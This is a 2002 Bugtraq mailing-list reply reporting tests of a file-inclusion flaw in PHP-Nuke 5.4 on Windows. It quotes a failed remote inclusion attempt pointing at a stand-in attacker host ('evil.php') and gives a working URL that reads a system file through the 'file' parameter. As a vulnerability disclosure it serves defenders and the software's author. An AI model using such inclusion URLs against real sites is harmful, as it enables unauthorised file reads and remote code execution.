[23970] in bugtraq
Re: PHP-Nuke allows Command Execution & Much more
daemon@ATHENA.MIT.EDU (RoMaNSoFt)
Thu Jan 24 15:34:14 2002
From: RoMaNSoFt <roman@madrid.com>
To: Dave Ahmad <da@securityfocus.com>
Cc: bugtraq@securityfocus.com
Date: Thu, 24 Jan 2002 17:18:08 +0100
Message-ID: <4rc05u47avh66ohrrlc16uuuf31oret8pc@4ax.com>
In-Reply-To: <Pine.LNX.4.43.0201210948020.2108-100000@mail>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote:
>Roman,
>
>I'll approve the post you sent yesterday.
Dave, I haven't seen my post in bugtraq. Perhaps did you forget it?
I've included the fixed version of the post so you can directly cc to
bugtraq, if you consider it appropiate. Cheers.
--Rom.
------------------------
Hi. I did some quick tests on a php-nuke running on Apache for
*Windows*. PHPNuke version I tested was 5.4 (which is the last release
of phpnuke at the time of testing). I couldn't reproduce your exploit.
I always get something like:
Warning: Failed opening 'http://attackingwebserver/evil.php' for
inclusion (include_path='') in c:\php\index.php on line 113
Nevertheless I realized that this other URL works:
http://victimserver/index.php?file=c:\winnt\win.ini
The former exploit shows the contens of win.ini file. At least it
worked for me :-)
Since phpnuke tested version is the last version at the time of
writing, I cc'ed this to Francisco Burzi (phpnuke author) 'cause it
seems like new stuff. This happened during last week.
Greetz,
--RoMaNSoFt
